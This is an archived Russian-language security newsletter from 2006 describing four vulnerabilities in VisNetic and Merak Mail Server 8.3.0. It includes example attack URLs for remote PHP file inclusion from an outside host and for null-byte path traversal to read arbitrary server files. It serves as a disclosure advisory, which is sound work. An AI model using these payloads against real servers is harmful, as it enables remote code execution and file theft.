Компьютер для продвинутых пользоватлей Выпуск по безопасности. Ошибки в VisNetic Mail Server и Merak (comp.paper.supuser) : Рассылка : Subscribe.Ru

Отправляет email-рассылки с помощью сервиса Sendsay

IT-безопасность в быту и не только

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

← Январь 2006 →
	1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18 18.01.2006 03:05:14 07:05:25	19	20	21	22
23	24	25	26	27	28	29 29.01.2006 07:05:11 12:05:09 16:05:06
30 30.01.2006 07:05:11 12:05:10 16:05:09	31 31.01.2006 07:05:37 11:05:25 16:05:09

Автор

Forester

Статистика

1.394 подписчиков
-1 за неделю

← Все выпуски →

Компьютер для продвинутых пользоватлей Выпуск по безопасности. Ошибки в VisNetic Mail Server и Merak

Информационный Канал Subscribe.Ru

Компьютер для продвинутых пользователей

Содержание:

VisNetic Mail Server и Merak Mail Server

ПО: VisNetic Mail Server и Merak Mail Server
Версия: 8.3.0 build 1

Описание:
Уязвимость позволяет использовать любым пользователям для получения информации и работы с уязвимой системой.
1) Webmail и webadmin услуги, выполнение из PHP и работающие с включенным "register_global". "language" and "lang_settings" переменный в "/accounts/inc/include.php" и "/admin/inc/include.php" не должным образом инициализируются, когда к сценариям обращаются непосредственно. Что дает возможность перезаписать переменные и вызвать сценарии с произвольным PHP кодом из локальных и удаленных источников.
Например:
http://[host]:32000/accounts/inc/include.php? language=0&lang_settings[0][1]=http://[host]/
http://[host]:32000/admin/inc/include.php? language=0&lang_settings[0][1]=http://[host]/
Успешное использование уязвимости позволяет выполнить произвольный PHP код с привилегиями System.
2) Ввод параметра "lang" в "/dir/include.html" не должным образом проверяется перед использованием. Это может быть использованным для работы с произвольными файлами.
Пример:
http://[host]:32000/dir/include.html?lang=[file]%00
Успешное использование позволяет работать с любыми файлами на сервере.
3) Ввод параметр "language" в "/mail/settings.html" не проверяется при обращении к базе данных. Это может использоваться совместно с "lang_settings" для работы с произвольны PHP кодом из локального и удаленного источника.
Пример:
http://[host]:32000/mail/settings.html? id=[current_id]&Save_x=1&language=TEST
http://[host]:32000/mail/index.html? id=[current_id]&lang_settings[TEST]=test;http://[host]/;
4) Переменные "Default_layout" и "layout_settings"не проверяються, когда "/mail/include.html" начинает работать с HTTP_USER_AGENT. Это можно использовать для просмотра содержания локальных файлов.
Пример (использовать не-IE/Mozilla/Firefox браузер):
http://[host]:32000/mail/index.html?/mail/index.html? default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2

VisNetic Mail Server и Merak Mail Server

Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора

Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки

Отписаться Вебом Почтой
Вспомнить пароль

В избранное

← Январь 2006 →
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18 18.01.2006 03:05:14 07:05:25	19	20	21	22
23	24	25	26	27	28	29 29.01.2006 07:05:11 12:05:09 16:05:06
30 30.01.2006 07:05:11 12:05:10 16:05:09	31 31.01.2006 07:05:37 11:05:25 16:05:09